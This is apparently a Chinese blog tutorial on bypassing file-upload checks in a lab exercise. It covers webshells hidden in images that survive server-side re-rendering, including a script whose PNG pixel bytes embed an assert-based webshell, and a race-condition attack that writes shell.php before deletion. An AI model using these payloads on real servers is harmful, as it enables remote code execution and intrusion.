• 文件上传之图片马混淆绕过与条件竞争


    一、图片马混淆绕过

    1.上传gif

    imagecreatefromxxxx函数把图片内容打散,,但是不会影响图片正常显示

    1. $is_upload = false;
    2. $msg = null;
    3. if (isset($_POST['submit'])){
    4. // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    5. $filename = $_FILES['upload_file']['name'];
    6. $filetype = $_FILES['upload_file']['type'];
    7. $tmpname = $_FILES['upload_file']['tmp_name'];
    8. $target_path=UPLOAD_PATH.'/'.basename($filename);
    9. // 获得上传文件的扩展名
    10. $fileext= substr(strrchr($filename,"."),1);
    11. //判断文件后缀与类型,合法才进行上传操作
    12. if(($fileext == "jpg") && ($filetype=="image/jpeg")){
    13. if(move_uploaded_file($tmpname,$target_path)){
    14. //使用上传的图片生成新的图片
    15. $im = imagecreatefromjpeg($target_path);
    16. if($im == false){
    17. $msg = "该文件不是jpg格式的图片!";
    18. @unlink($target_path);
    19. }else{
    20. //给新图片指定文件名
    21. srand(time());
    22. $newfilename = strval(rand()).".jpg";
    23. //显示二次渲染后的图片(使用用户上传图片生成的新图片)
    24. $img_path = UPLOAD_PATH.'/'.$newfilename;
    25. imagejpeg($im,$img_path);
    26. @unlink($target_path);
    27. $is_upload = true;
    28. }
    29. } else {
    30. $msg = "上传出错!";
    31. }
    32. }else if(($fileext == "png") && ($filetype=="image/png")){
    33. if(move_uploaded_file($tmpname,$target_path)){
    34. //使用上传的图片生成新的图片
    35. $im = imagecreatefrompng($target_path);
    36. if($im == false){
    37. $msg = "该文件不是png格式的图片!";
    38. @unlink($target_path);
    39. }else{
    40. //给新图片指定文件名
    41. srand(time());
    42. $newfilename = strval(rand()).".png";
    43. //显示二次渲染后的图片(使用用户上传图片生成的新图片)
    44. $img_path = UPLOAD_PATH.'/'.$newfilename;
    45. imagepng($im,$img_path);
    46. @unlink($target_path);
    47. $is_upload = true;
    48. }
    49. } else {
    50. $msg = "上传出错!";
    51. }
    52. }else if(($fileext == "gif") && ($filetype=="image/gif")){
    53. if(move_uploaded_file($tmpname,$target_path)){
    54. //使用上传的图片生成新的图片
    55. $im = imagecreatefromgif($target_path);
    56. if($im == false){
    57. $msg = "该文件不是gif格式的图片!";
    58. @unlink($target_path);
    59. }else{
    60. //给新图片指定文件名
    61. srand(time());
    62. $newfilename = strval(rand()).".gif";
    63. //显示二次渲染后的图片(使用用户上传图片生成的新图片)
    64. $img_path = UPLOAD_PATH.'/'.$newfilename;
    65. imagegif($im,$img_path);
    66. @unlink($target_path);
    67. $is_upload = true;
    68. }
    69. } else {
    70. $msg = "上传出错!";
    71. }
    72. }else{
    73. $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    74. }
    75. }

    首先copy命令生成图片马

    然后上传图片马到服务器,保存返回后的图片

    然后使用010editor比较,哪些内容没有被混淆,我们就可以把木马写在没有被混淆的内容里

    然后直接文件包含,包含图片内的php代码

     

    2.上传png

    这里可以使用脚本进行图片马制作,里面的php代码基本不会被混淆

    1. $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    2. 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    3. 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    4. 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    5. 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    6. 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    7. 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    8. 0x66, 0x44, 0x50, 0x33);
    9. $img = imagecreatetruecolor(32, 32);
    10. for ($y = 0; $y < sizeof($p); $y += 3) {
    11. $r = $p[$y];
    12. $g = $p[$y+1];
    13. $b = $p[$y+2];
    14. $color = imagecolorallocate($img, $r, $g, $b);
    15. imagesetpixel($img, round($y / 3), 0, $color);
    16. }
    17. imagepng($img,'./1.png');
    18. ?>

    将图片放在该脚本下的同级目录,运行后生成1.png

    生成后查看内容,发现有两个参数,一个GET参数0,一个POST参数1 

     

    那就0给到assert,1给到phpinfo();,成功包含 

     

    二、条件竞争

    1.分析

    条件竞争型的漏洞在很多漏洞中都有涉及,在文件上传中造成这种漏洞的原因是代码中是先保存上传的文件在服务器上,然后验证再删除的,这就会造成攻击者可以利用文件被保存在服务器上与被删除的时间间隙来访问文件,然后重新生成了一个新木马

    我们可以直接上传一个有写功能的php文件,然后bp抓包,一直发包,同时一直访问刚刚上传的php文件,总有一次会成功生成一个新的木马

    看代码片段可以发现文件是先保存在服务器上,然后unlink函数删除的

    1. if(isset($_POST['submit'])){
    2. $ext_arr = array('jpg','png','gif');
    3. $file_name = $_FILES['upload_file']['name'];
    4. $temp_file = $_FILES['upload_file']['tmp_name'];
    5. $file_ext = substr($file_name,strrpos($file_name,".")+1);
    6. $upload_file = UPLOAD_PATH . '/' . $file_name;
    7. if(move_uploaded_file($temp_file, $upload_file)){
    8. if(in_array($file_ext,$ext_arr)){
    9. $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
    10. rename($upload_file, $img_path);
    11. $is_upload = true;
    12. }else{
    13. $msg = "只允许上传.jpg|.png|.gif类型文件!";
    14. unlink($upload_file);
    15. }
    16. }else{
    17. $msg = '上传出错!';
    18. }
    19. }

    先上传写功能木马,然后抓包,放到intruder里面,随便找个数字,

    然后选持续发包

    然后我们一直访问上传的php文件,让它生成新的木马

     fputs(fopen('../shell.php','w'),'');?>

    成功后就会生成一个shell.php

    直接访问

  • 相关阅读:
    创建HTTP请求的几种方式
    Java学习笔记------常用API(二)
    机器学习笔记之线性回归——从概率密度函数角度认识岭回归
    shell脚本字典创建遍历打印
    【Android 屏幕适配】屏幕适配通用解决方案 ① ( ScreenMatch 插件使用 )
    汉字风格迁移篇--中文字体的多任务对抗学习
    全球创业浪潮:跨境电商的创新时代
    模块化---common.js
    BI技巧丨筛选重置
    基于单片机的高精度心理测试仪设计
  • 原文地址:https://blog.csdn.net/CQ17743254852/article/details/132711023